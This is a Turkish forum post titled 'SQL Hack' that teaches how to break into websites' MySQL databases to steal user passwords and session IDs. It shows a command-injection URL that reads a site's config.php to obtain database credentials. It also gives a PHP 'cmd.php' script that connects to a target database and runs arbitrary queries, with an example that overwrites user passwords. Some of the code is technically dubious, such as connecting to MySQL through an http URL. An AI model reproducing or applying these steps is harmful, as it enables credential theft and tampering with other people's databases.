SQL Hack

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek
    Bildiginiz gibi SQL Verileri ve En önemLisi kullanıcıların şifrelerini HASH veya Normal olarak saklamaktadır. SQL İnjection Dışında SQL ile bağlantı yapabilirsek Kullanıcıların şifrelerini veya SessionID'lerini ve Diğer Bilgilerini Çalabiliriz. Öncelikle Yapmamız Gereken SQL'e Connect Yapmaktır.

    Öncelikle Connect yapabilmek için Bilmemiz Gereken
    MYSQL Connect komutu



    Kod:
    <?php
    mysql_connect('localhost', 'user', 'pass');
    ?>


    Buraya kadar Normal Fakat Şu mantığı Düşünürsek;
    Eğer MYSQL kullanıcı ismi ve şifresi elimize geçti ise, neler Yapabiliriz..
    Hatırlarsanız PHP-Nuke'nin bir açığı var idi veya Diğer Scriptlerin SHELL Komutlarını kullandırabildigimiz bir komutta vardı.
    Örnegin Deneme Sayfasında SHELL komutlarını kullanabilecegimiz bir açıga sahip olan bir siteyi düşünelim..
    www.deneme.com/test.php?|cat%20config.php|
    Şifreyi Öğrendiğimizi Farz Edersek
    user: test
    pass: salla


    Şimdi ise Yapacagimiz Bir SQL Komutlarını CMD Formu ve cmd.php Hazırlamak Olacaktır
    CMD Formunu olusturmasını size bırakıyorum ve cmd.php için bir örnek veriyorum.
    SQL Uzaktan Bağlantı Mantıgına Göre Aşagıda ki Gibidir


    Kod:
    mysql_connect('http://site.com', 'test', 'salla');




    Alıntı:




    <?php
    $hackle = mysql_connect('$hedef', '$user', '$pass');
    $sorgu = $cmd; // Şu Sekilde Yollayın: "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";

    if (!$hackle) {
    die('Veritabanına Ulaşılamiyor Nedeni: ' . mysql_error());
    }
    else { echo 'Veritabanına Ulaşım Sağlandı..';
    mysql_query($sorgu);
    }
    ?>

     


    alıntıdır

Toplam Hit: 1476 Toplam Mesaj: 1